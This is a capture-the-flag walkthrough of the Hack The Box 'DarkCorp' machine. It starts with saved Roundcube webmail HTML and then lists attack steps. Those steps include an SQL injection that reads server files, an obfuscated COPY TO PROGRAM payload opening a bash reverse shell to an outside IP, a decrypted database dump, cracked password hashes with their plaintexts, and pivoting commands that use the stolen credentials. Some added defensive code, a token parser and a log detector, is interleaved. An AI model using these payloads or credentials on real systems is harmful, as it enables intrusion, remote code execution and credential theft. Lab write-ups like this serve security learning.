Copyright (C) The Roundcube Dev Team

The JavaScript code in this page is free software: you can redistribute
it and/or modify it under the terms of the GNU General Public License
as published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.

The code is distributed WITHOUT ANY WARRANTY; without even the implied
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU GPL for more details.

@licend The above is the entire license notice
for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"mail","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10607,"cookie_domain":"","cookie_path":"/","cookie_secure":false,"dark_mode_support":true,"skin":"elastic","extwin":1,"blankpage":"skins/elastic/watermark.html","refresh_interval":10,"session_lifetime":600,"action":"show","comm_path":"/?_task=mail","user_id":"twZLggeBqoXLUfNK","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","browser_capabilities":{"pdf":"1","flash":"0","tiff":"0","webp":"1","pgpmime":"0"},"uid":"2","safemode":false,"message_context":null,"message_flags":["seen"],"sender":"ebelford \[email protected]\u003E","mailbox":"INBOX","username":"bcase","permaurl":"/?_task=mail&_action=show&_uid=2&_mbox=INBOX","has_writeable_addressbook":true,"delimiter":".","mimetypes":["text/plain","text/html","image/jpeg","image/gif","image/png","image/bmp","image/tiff","image/webp","application/x-javascript","application/pdf","message/rfc822"],"read_when_deleted":true,"display_next":true,"mailboxes":{"INBOX":{"id":"INBOX","name":"Inbox","virtual":false,"class":"inbox"}},"mailboxes_list":["INBOX"],"request_token":"QpdT8JMZkK0l5s23G8KkDNgOQl7p9Cca"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","checkingmail":"Checking for new messages...","deletemessage":"Delete message","movemessagetotrash":"Move message to trash","movingmessage":"Moving message(s)...","deletingmessage":"Deleting message(s)...","markingmessage":"Marking message(s)...","replyall":"Reply all","replylist":"Reply list","bounce":"Resend","bouncemsg":"Resend (bounce)","sendingmessage":"Sending message...","back":"Back","errortitle":"An error occurred!","options":"Options","plaintoggle":"Plain text","htmltoggle":"HTML","previous":"Previous","next":"Next","select":"Select","browse":"Browse","choosefile":"Choose file...","choosefiles":"Choose files...","purgefolderconfirm":"Do you really want to delete all messages in this folder?","deletemessagesconfirm":"Do you really want to delete selected message(s)?","viewsource":"Show source","details":"Details","summary":"Summary","arialabelmessageheaders":"Message headers"});
rcmail.gui_container("toolbar","mailtoolbar");
rcmail.gui_container("forwardmenu","forward-menu");
rcmail.gui_container("replyallmenu","replyall-menu");
rcmail.gui_container("messagemenu","message-menu");
rcmail.gui_container("markmenu","markmessage-menu");
rcmail.gui_container("headerlinks","header-links");
rcmail.gui_container("attachmentmenu","attachmentmenu");
rcmail.gui_container("mailtomenu","mailto-menu");rcmail.register_button('compose', 'rcmbtn100', 'link', '', '', '');
rcmail.register_button('reply', 'rcmbtn101', 'link', 'reply', '', '');
rcmail.register_button('reply-all', 'rcmbtn102', 'link', 'reply-all', '', '');
rcmail.register_button('forward', 'rcmbtn103', 'link', 'forward', '', '');
rcmail.register_button('delete', 'rcmbtn104', 'link', 'delete', '', '');
rcmail.register_button('print', 'rcmbtn105', 'link', 'print', '', '');
rcmail.register_button('previousmessage', 'rcmbtn106', 'link', 'prev', '', '');
rcmail.register_button('nextmessage', 'rcmbtn107', 'link', 'next', '', '');
rcmail.register_button('forward-inline', 'rcmbtn108', 'link', 'forward inline active', '', '');
rcmail.register_button('forward-attachment', 'rcmbtn109', 'link', 'forward attachment active', '', '');
rcmail.register_button('bounce', 'rcmbtn110', 'link', 'forward bounce active', '', '');
rcmail.register_button('reply-all', 'rcmbtn111', 'link', 'reply all active', '', '');
rcmail.register_button('reply-list', 'rcmbtn112', 'link', 'reply list active', '', '');
rcmail.register_button('print', 'rcmbtn113', 'link', 'print active', '', '');
rcmail.register_button('download', 'rcmbtn114', 'link', 'download active', '', '');
rcmail.register_button('edit', 'rcmbtn115', 'link', 'edit asnew active', '', '');
rcmail.register_button('viewsource', 'rcmbtn116', 'link', 'source active', '', '');
rcmail.register_button('move', 'rcmbtn117', 'link', 'move active', '', '');
rcmail.register_button('copy', 'rcmbtn118', 'link', 'copy active', '', '');
rcmail.register_button('open', 'rcmbtn119', 'link', 'extwin active', '', '');
rcmail.register_button('mark', 'rcmbtn120', 'link', 'read active', '', '');
rcmail.register_button('mark', 'rcmbtn121', 'link', 'unread active', '', '');
rcmail.register_button('mark', 'rcmbtn122', 'link', 'flag active', '', '');
rcmail.register_button('mark', 'rcmbtn123', 'link', 'unflag active', '', '');
rcmail.gui_object('remoteobjectsmsg', 'remote-objects-message');
rcmail.gui_object('messagebody', 'messagebody');
rcmail.register_button('open-attachment', 'attachmenuopen', 'link', 'extwin active', '', '');
rcmail.register_button('download-attachment', 'attachmenudownload', 'link', 'download active', '', '');
rcmail.gui_object('message', 'messagestack');
</script>

<script src="plugins/jqueryui/js/jquery-ui.min.js?s=1716107237"></script>
</head>
<body class="task-mail action-show">

<div id="layout">






<h1 class="voice">Message preview</h1>

<div id="layout-content" class="selected">

<h2 id="aria-label-toolbar" class="voice">Application toolbar</h2>
<div class="header" role="toolbar" aria-labelledby="aria-label-toolbar">
<a class="button icon back-list-button" href="#back"><span class="inner">Back</span></a>
<span class="header-title"></span>

<div id="mailtoolbar" class="toolbar menu" role="toolbar">
<a class="compose hidden" title="Create a new message" id="rcmbtn100" role="button" href="/?_task=mail&amp;_action=compose" onclick="return rcmail.command('compose','',this,event)"><span class="inner">Compose</span></a>
<a class="reply disabled" title="Reply to sender" data-content-button="true" id="rcmbtn101" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply','',this,event)"><span class="inner">Reply</span></a>
<span class="dropbutton">
<a class="reply-all disabled" title="Reply to list or to sender and all recipients" id="rcmbtn102" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-all','',this,event)"><span class="inner">Reply all</span></a>
<a href="#reply-all" id="replyallmenulink" class="dropdown" data-popup="replyall-menu" tabindex="0">
<span class="inner">Reply-all options</span>
</a>
</span>
<span class="dropbutton">
<a class="forward disabled" title="Forward the message" id="rcmbtn103" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward','',this,event)"><span class="inner">Forward</span></a>
<a href="#forward" id="forwardmenulink" class="dropdown" data-popup="forward-menu" tabindex="0">
<span class="inner">Forwarding options</span>
</a>
</span>
<span class="spacer"></span>
<a class="delete disabled" title="Delete message" id="rcmbtn104" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('delete','',this,event)"><span class="inner">Delete</span></a>

<a class="print disabled" title="Print this message" data-hidden="small" id="rcmbtn105" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('print','',this,event)"><span class="inner">Print</span></a>


<a id="markmessagemenulink" class="markmessage" title="Mark messages" data-popup="markmessage-menu" role="button" href="#"><span class="inner">Mark</span></a>
<a id="messagemenulink" class="more" title="More actions..." data-popup="message-menu" role="button" href="#"><span class="inner">More</span></a>

<span class="spacer"></span>
<a class="prev disabled" title="Show previous message" data-hidden="small" id="rcmbtn106" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('previousmessage','',this,event)"><span class="inner">Previous</span></a>
<a class="next disabled" title="Show next message" data-hidden="small" id="rcmbtn107" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('nextmessage','',this,event)"><span class="inner">Next</span></a>

</div>

<div id="forward-menu" class="popupmenu">
<h3 id="aria-label-forward-menu" class="voice">Forwarding options</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-forward-menu">
<li role="menuitem"><a class="forward inline disabled" id="rcmbtn108" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward-inline','sub',this,event)">Forward inline</a></li>
<li role="menuitem"><a class="forward attachment disabled" id="rcmbtn109" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward-attachment','sub',this,event)">Forward as attachment</a></li>
<li role="menuitem"><a class="forward bounce disabled" id="rcmbtn110" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('bounce','',this,event)">Resend (bounce)</a></li>

</ul>
</div>

<div id="replyall-menu" class="popupmenu">
<h3 id="aria-label-replyall-menu" class="voice">Reply-all options</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-replyall-menu">
<li role="menuitem"><a class="reply all disabled" id="rcmbtn111" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-all','sub',this,event)">Reply all</a></li>
<li role="menuitem"><a class="reply list disabled" id="rcmbtn112" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-list','sub',this,event)">Reply list</a></li>

</ul>
</div>

<div id="message-menu" class="popupmenu">
<h3 id="aria-label-message-menu" class="voice">More message actions</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-message-menu">
<li role="menuitem"><a class="print disabled" data-hidden="small" id="rcmbtn113" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('print','',this,event)">Print this message</a></li>

<li role="menuitem"><a class="download disabled" id="rcmbtn114" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('download','',this,event)">Export</a></li>
<li role="menuitem"><a class="edit asnew disabled" id="rcmbtn115" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('edit','new',this,event)">Edit as new</a></li>
<li role="menuitem"><a class="source disabled" id="rcmbtn116" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('viewsource','',this,event)">Show source</a></li>
<li role="menuitem"><a class="move disabled" aria-haspopup="true" id="rcmbtn117" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('move','',this,event)"><span class="folder-selector-link">Move to...</span></a></li>
<li role="menuitem"><a class="copy disabled" aria-haspopup="true" id="rcmbtn118" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('copy','',this,event)"><span class="folder-selector-link">Copy to...</span></a></li>
<li role="menuitem"><a target="_blank" class="extwin disabled" data-hidden="small" id="rcmbtn119" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('open','',this,event)">Open in new window</a></li>

</ul>
</div>

<div id="markmessage-menu" class="popupmenu">
<h3 id="aria-label-markmessage-menu" class="voice">Mark selected messages as...</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-markmessage-menu">
<li role="menuitem"><a class="read disabled" id="rcmbtn120" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','read',this,event)">As read</a></li>
<li role="menuitem"><a class="unread disabled" id="rcmbtn121" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','unread',this,event)">As unread</a></li>
<li role="menuitem"><a class="flag disabled" id="rcmbtn122" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','flagged',this,event)">As flagged</a></li>
<li role="menuitem"><a class="unflag disabled" id="rcmbtn123" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','unflagged',this,event)">As unflagged</a></li>


</ul>
</div>



</div>

<div class="content frame-content" role="main">
<div id="message-header">
<h2 class="subject">
<span class="voice">Subject: </span>
Analytics Dashboard

</h2>
<div class="header">
<img src="/?_task=addressbook&amp;_action=photo&amp;_email=ebelford%40drip.htb&amp;_error=1&amp;_bgcolor=transparent" alt="Contact photo" class="contactphoto" onerror="this.onerror = null; this.src = 'skins/elastic/images/contactpic.svg';">
<div class="header-content">
<div class="header-summary"><span>From <span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','ebelford &lt;[email protected]&gt;',this)" title="[email protected]">ebelford</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','ebelford &lt;[email protected]&gt;',this)"></a></span> on <span class="text-nowrap">2024-12-24 13:38</span></span></div>
<table class="header-headers"><tbody><tr><td class="header-title">From</td><td class="header from"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','ebelford &lt;[email protected]&gt;',this)" title="[email protected]">ebelford</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','ebelford &lt;[email protected]&gt;',this)"></a></span></td></tr><tr><td class="header-title">To</td><td class="header to"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','[email protected]',this)" title="[email protected]">[email protected]</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','[email protected]',this)"></a></span></td></tr><tr><td class="header-title">Date</td><td class="header date">2024-12-24 13:38</td></tr></tbody></table>
<div class="header-links">


<a href="#headers" class="headers-summary" onclick="return UI.headers_show(true)"></a>
<a href="#all-headers" class="headers-all" onclick="return UI.headers_dialog()">Headers</a>



</div>
</div>
</div>
</div>
<div id="message-content">
<div class="leftcol" role="region" aria-labelledby="aria-label-messageattachments">
<h2 id="aria-label-messageattachments" class="voice">Attachments</h2>

</div>
<div class="rightcol" role="region" aria-labelledby="aria-label-messagebody">
<h2 id="aria-label-messagebody" class="voice">Message Body</h2>
<div id="message-objects">
<div id="remote-objects-message" class="notice" style="display: none"><span>To protect your privacy remote resources have been blocked.</span>&nbsp;<span class="boxbuttons"><a href="#loadremote" onclick="rcmail.command('load-remote')">Allow</a></span></div>
</div>
<div id="messagebody"><div class="message-part" id="message-part1"><div class="pre">Hey Bryce,<br>
<br>
The Analytics dashboard is now live. While it&#039;s still in development and limited in functionality, it should provide a good starting point for gathering metadata on the users currently using our service.<br>
<br>
You can access the dashboard at dev-a3f1-01.drip.htb. Please note that you&#039;ll need to reset your password before logging in.<br>
<br>
If you encounter any issues or have feedback, let me know so I can address them promptly.<br>
<br>
Thanks<br>
</div></div></div>
</div>
</div>
</div>
</div>

<!-- popup menus -->
<div id="attachmentmenu" class="popupmenu">
<h3 id="aria-label-attachmentmenu" class="voice">Attachment options</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-attachmentmenu">
<li role="menuitem"><a id="attachmenuopen" class="extwin disabled" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('open-attachment','',this,event)">Open</a></li>
<li role="menuitem"><a id="attachmenudownload" class="download disabled" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('download-attachment','',this,event)">Download</a></li>

</ul>
</div>

<div id="mailto-menu" class="popupmenu">
<h3 id="aria-label-mailtomenu" class="voice">Email address options</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-mailtomenu">
<li role="menuitem"><a class="addressbook" id="rcmbtn124" role="button" tabindex="-1" aria-disabled="true" href="#">Add to address book</a></li>
<li role="menuitem"><a class="compose" id="rcmbtn125" role="button" tabindex="-1" aria-disabled="true" href="#">Compose mail to</a></li>

</ul>
</div>


</div>



<div id="messagestack"></div>
<script>
$(function() {
rcmail.init();
});
</script>



<script src="skins/elastic/deps/bootstrap.bundle.min.js?s=1716107245"></script>
<script src="skins/elastic/ui.min.js?s=1716107237"></script>

</body>
</html>

And we can see this message in it:

You can access the dashboard at dev-a3f1-01.drip.htb. Please note that you&#039;ll need to reset your password before logging in.

We've got a new endpoint to access: http://dev-a3f1-01.drip.htb.
As per the message, we can reset the password. The steps are as follows:

username: bcase
password: new_password

SIDE NOTE:
I noticed the first link: http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.Z67uyw.qKq2xqbpySG1wnw6mq0EMnMA1qI
and the second link: http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.Z67yeQ.JowFY4TQdpIcKVu12DqU7lScefI
They have this in common: http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.Z67
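Why the two links share a prefix, as an added example that is not from the original write-up: it assumes the tokens use the `payload.timestamp.signature` layout of itsdangerous's timed serializer (the page does not name the library), and the function names are hypothetical. The payload and issue time are only encoded, not encrypted, so the trailing signature and a short server-side expiry are the only protection once a mailbox can be read.

```python
import base64
import json
import os
from datetime import datetime, timezone

# The two reset tokens quoted in the side note above (path component only).
TOKEN_A = "ImJjYXNlQGRyaXAuaHRiIg.Z67uyw.qKq2xqbpySG1wnw6mq0EMnMA1qI"
TOKEN_B = "ImJjYXNlQGRyaXAuaHRiIg.Z67yeQ.JowFY4TQdpIcKVu12DqU7lScefI"


def b64url_decode(field):
    """Decode unpadded URL-safe base64, as used in each token field."""
    return base64.urlsafe_b64decode(field + "=" * (-len(field) % 4))


def parse_reset_token(token):
    """Split payload.timestamp.signature and decode the two readable fields.

    Assumption: JSON payload, big-endian Unix timestamp, HMAC signature
    (the itsdangerous timed-serializer layout).
    """
    try:
        payload_b64, ts_b64, sig_b64 = token.split(".")
    except ValueError:
        raise ValueError("expected three dot-separated fields") from None
    issued = int.from_bytes(b64url_decode(ts_b64), "big")
    return {
        "payload": json.loads(b64url_decode(payload_b64)),
        "issued_at": datetime.fromtimestamp(issued, tz=timezone.utc),
        "signature_bytes": len(b64url_decode(sig_b64)),
    }


def is_expired(token, max_age_s, now):
    """Freshness check a reset endpoint should enforce before accepting a token."""
    age = (now - parse_reset_token(token)["issued_at"]).total_seconds()
    # A negative age means the token claims to come from the future: reject it.
    return age < 0 or age > max_age_s


def shared_prefix(a, b):
    """Longest common leading substring of two tokens."""
    return os.path.commonprefix([a, b])


if __name__ == "__main__":
    for tok in (TOKEN_A, TOKEN_B):
        info = parse_reset_token(tok)
        print(info["payload"], info["issued_at"].isoformat(), info["signature_bytes"])
    # Same account => same payload field; issue times minutes apart => same
    # high-order timestamp bytes. Only the signature differs unpredictably.
    print("shared:", shared_prefix(TOKEN_A, TOKEN_B))
```

The shared part is therefore the encoded account identifier plus the leading bytes of the issue time, which is why two resets for the same account minutes apart look alike up to `.Z67`.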

Web App

We can discover an SQL injection with some testing:

''; SELECT pg_read_file('/var/log/postgresql/postgresql-15-main.log', 0, 1000000);

We get this data back:

|ID|Username|E-Mail|Host Header|IP Address|
|---|---|---|---|---|
|5001|support|[email protected]|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0|10.0.50.10|
|5002|bcase|[email protected]|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0|10.0.50.10|
|5003|ebelford|[email protected]|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0|10.0.50.10|
|5004|kujen|[email protected]|Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0|172.16.20.1|

I can also get a reverse shell:

'';DO $$ DECLARE c text; BEGIN c:=CHR(67)||CHR(79)||CHR(80)||CHR(89)||' (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.16.20/9001 0>&1"''';EXECUTE c; END $$;

And we get it on our listener:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.20] from (UNKNOWN) [10.129.161.63] 49960
bash: cannot set terminal process group (156517): Inappropriate ioctl for device
bash: no job control in this shell
postgres@drip:/var/lib/postgresql/15/main$
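On the detection side, both statements above leave a trace when statement logging is on. The following is an added example, not part of the original write-up: it scans PostgreSQL log lines for server-side file reads and `COPY ... PROGRAM`, folding `CHR()` concatenation first so that the keyword-splitting trick used in the second payload does not hide `COPY`. The log lines are constructed, and the log format (`log_statement = 'all'` with a timestamp/user prefix) and the role name `webapp` are assumptions.

```python
import re

# Constructed sample log (not from the page); the program run is a benign `id`.
SAMPLE_LOG = """\
2025-02-14 07:31:02 UTC [4121] webapp@appdb LOG:  statement: SELECT id, username FROM "Users" WHERE username = 'bcase'
2025-02-14 07:31:40 UTC [4121] webapp@appdb LOG:  statement: SELECT 1; SELECT pg_read_file('/var/log/postgresql/postgresql-15-main.log', 0, 1000000);
2025-02-14 07:33:15 UTC [4121] webapp@appdb LOG:  statement: DO $$ DECLARE c text; BEGIN c:=CHR(67)||CHR(79)||CHR(80)||CHR(89)||' (SELECT '''') to program ''id'''; EXECUTE c; END $$;
2025-02-14 07:34:00 UTC [4122] webapp@appdb LOG:  statement: COPY public."Users" (id, username) FROM stdin;
"""

STATEMENT = re.compile(r"LOG:\s+(?:statement|execute [^:]+): (.*)$")
CHR_CALL = re.compile(r"chr\(\s*(\d+)\s*\)", re.I)
# Three or more chained CHR() calls: keywords built character by character.
CHR_CHAIN = re.compile(r"(?:chr\(\s*\d+\s*\)\s*\|\|\s*){2,}chr\(\s*\d+\s*\)", re.I)
FILE_READ = re.compile(r"\b(?:pg_read_file|pg_read_binary_file|pg_ls_dir|lo_import)\s*\(")
COPY_PROGRAM = re.compile(r"\bcopy\b.*\b(?:to|from)\s+program\b")


def decode_chr(match):
    """Replace CHR(n) with the character it produces (left as-is if out of range)."""
    code = int(match.group(1))
    return chr(code) if code < 0x110000 else match.group(0)


def normalize(stmt):
    """Undo CHR()/|| string building so keywords reappear as plain text.

    Quotes are dropped too, so a literal that merely contains the words
    'copy ... to program' will also match; triage hits, do not auto-block.
    """
    flat = CHR_CALL.sub(decode_chr, stmt)
    flat = flat.replace("||", "").replace("'", "")
    return re.sub(r"\s+", " ", flat).lower()


def classify(stmt):
    """Return the sorted list of rule tags a single SQL statement triggers."""
    tags = set()
    flat = normalize(stmt)
    if CHR_CHAIN.search(stmt):
        tags.add("chr-obfuscation")
    if FILE_READ.search(flat):
        tags.add("server-file-read")
    if COPY_PROGRAM.search(flat):
        tags.add("copy-program")
    return sorted(tags)


def scan(log_text):
    """Return (line_number, tags) for every logged statement that matches a rule."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        found = STATEMENT.search(line)
        if not found:
            continue
        tags = classify(found.group(1))
        if tags:
            hits.append((number, tags))
    return hits


if __name__ == "__main__":
    for number, tags in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(tags)}")
```

`COPY ... TO PROGRAM` requires superuser or membership in `pg_execute_server_program`, and `pg_read_file` is restricted to superusers unless EXECUTE has been granted, so a web application role that holds neither turns both statements into permission errors.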

Checking the /etc/hosts file, we find the DC's address:

postgres@drip:/var/lib/postgresql/15/main$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost drip.htb mail.drip.htb dev-a3f1-01.drip.htb

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb
172.16.20.3 drip.darkcorp.htb
postgres@drip:/var/lib/postgresql/15/main$

We can use the postgres data we got earlier to decrypt the backed-up PostgreSQL database:

postgres@drip:/var/lib/postgresql/15/main$ gpg --homedir /var/lib/postgresql/.gnupg --pinentry-mode=loopback  --passphrase 2Qa2SsBkQvsc --use-agent --decrypt /var/backups/postgres/dev-dripmail.old.sql.gpg > dev-dripmail.old.sql
<res/dev-dripmail.old.sql.gpg > dev-dripmail.old.sql
gpg: encrypted with 3072-bit RSA key, ID 1112336661D8BC1F, created 2025-01-08
"postgres <[email protected]>"

In it we find some user hashes:

postgres@drip:/var/lib/postgresql/15/main$ cat dev-dripmail.old.sql
cat dev-dripmail.old.sql
--
-- PostgreSQL database dump
--

-- Dumped from database version 15.10 (Debian 15.10-0+deb12u1)
-- Dumped by pg_dump version 15.10 (Debian 15.10-0+deb12u1)

SET statement_timeout = 0;
SET lock_timeout = 0;
SET idle_in_transaction_session_timeout = 0;
SET client_encoding = 'UTF8';
SET standard_conforming_strings = on;
SELECT pg_catalog.set_config('search_path', '', false);
SET check_function_bodies = false;
SET xmloption = content;
SET client_min_messages = warning;
SET row_security = off;

SET default_tablespace = '';

SET default_table_access_method = heap;

--
-- Name: Admins; Type: TABLE; Schema: public; Owner: postgres
--

CREATE TABLE public."Admins" (
id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80)
);


ALTER TABLE public."Admins" OWNER TO postgres;

--
-- Name: Admins_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--

CREATE SEQUENCE public."Admins_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;


ALTER TABLE public."Admins_id_seq" OWNER TO postgres;

--
-- Name: Admins_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--

ALTER SEQUENCE public."Admins_id_seq" OWNED BY public."Admins".id;


--
-- Name: Users; Type: TABLE; Schema: public; Owner: postgres
--

CREATE TABLE public."Users" (
id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80),
host_header character varying(255),
ip_address character varying(80)
);


ALTER TABLE public."Users" OWNER TO postgres;

--
-- Name: Users_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--

CREATE SEQUENCE public."Users_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;


ALTER TABLE public."Users_id_seq" OWNER TO postgres;

--
-- Name: Users_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--

ALTER SEQUENCE public."Users_id_seq" OWNED BY public."Users".id;


--
-- Name: Admins id; Type: DEFAULT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public."Admins" ALTER COLUMN id SET DEFAULT nextval('public."Admins_id_seq"'::regclass);


--
-- Name: Users id; Type: DEFAULT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public."Users" ALTER COLUMN id SET DEFAULT nextval('public."Users_id_seq"'::regclass);


--
-- Data for Name: Admins; Type: TABLE DATA; Schema: public; Owner: postgres
--

COPY public."Admins" (id, username, password, email) FROM stdin;
1 bcase dc5484871bc95c4eab58032884be7225 [email protected]
2 victor.r cac1c7b0e7008d67b6db40c03e76b9c0 [email protected]
3 ebelford 8bbd7f88841b4223ae63c8848969be86 [email protected]
\.


--
-- Data for Name: Users; Type: TABLE DATA; Schema: public; Owner: postgres
--

COPY public."Users" (id, username, password, email, host_header, ip_address) FROM stdin;
5001 support d9b9ecbf29db8054b21f303072b37c4e [email protected] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5002 bcase 1eace53df87b9a15a37fdc11da2d298d [email protected] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5003 ebelford 0cebd84e066fd988e89083879e88c5f9 [email protected] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
\.


--
-- Name: Admins_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--

SELECT pg_catalog.setval('public."Admins_id_seq"', 1, true);


--
-- Name: Users_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--

SELECT pg_catalog.setval('public."Users_id_seq"', 5003, true);


--
-- Name: Admins Admins_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public."Admins"
ADD CONSTRAINT "Admins_pkey" PRIMARY KEY (id);


--
-- Name: Users Users_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public."Users"
ADD CONSTRAINT "Users_pkey" PRIMARY KEY (id);


--
-- Name: TABLE "Admins"; Type: ACL; Schema: public; Owner: postgres
--

GRANT SELECT ON TABLE public."Admins" TO dripmail_dba;


--
-- Name: SEQUENCE "Admins_id_seq"; Type: ACL; Schema: public; Owner: postgres
--

GRANT ALL ON SEQUENCE public."Admins_id_seq" TO dripmail_dba;


--
-- Name: TABLE "Users"; Type: ACL; Schema: public; Owner: postgres
--

GRANT SELECT ON TABLE public."Users" TO dripmail_dba;


--
-- Name: SEQUENCE "Users_id_seq"; Type: ACL; Schema: public; Owner: postgres
--

GRANT ALL ON SEQUENCE public."Users_id_seq" TO dripmail_dba;


--
-- PostgreSQL database dump complete

Crack 8bbd7f88841b4223ae63c8848969be86 with hashcat mode 0:

ebelford:8bbd7f88841b4223ae63c8848969be86:ThePlague61780
victor.r:cac1c7b0e7008d67b6db40c03e76b9c0:victor1gustavo@#

We connect to the web server, which is at 172.16.20.2:

ssh [email protected] -L 5000:172.16.20.2:5000

Now access it with victor's creds.
Requests use NTLM auth: Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAgAAAAAAAAACAAAAA=

NTLM Relay Attack

https://www.horizon3.ai/attack-research/n0-attack-paths/the-elephant-in-the-room-ntlm-coercion-and-understanding-its-impact/

https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx

First, use sshuttle to forward everything:

sshuttle -r ebelford:'ThePlague61780'@drip.htb 172.16.20.0/24 -vv

Then use ligolo to forward 172.16.20.3:8080 => 10.10.16.20:80:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ ./proxy -selfcert -laddr 0.0.0.0:11601
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
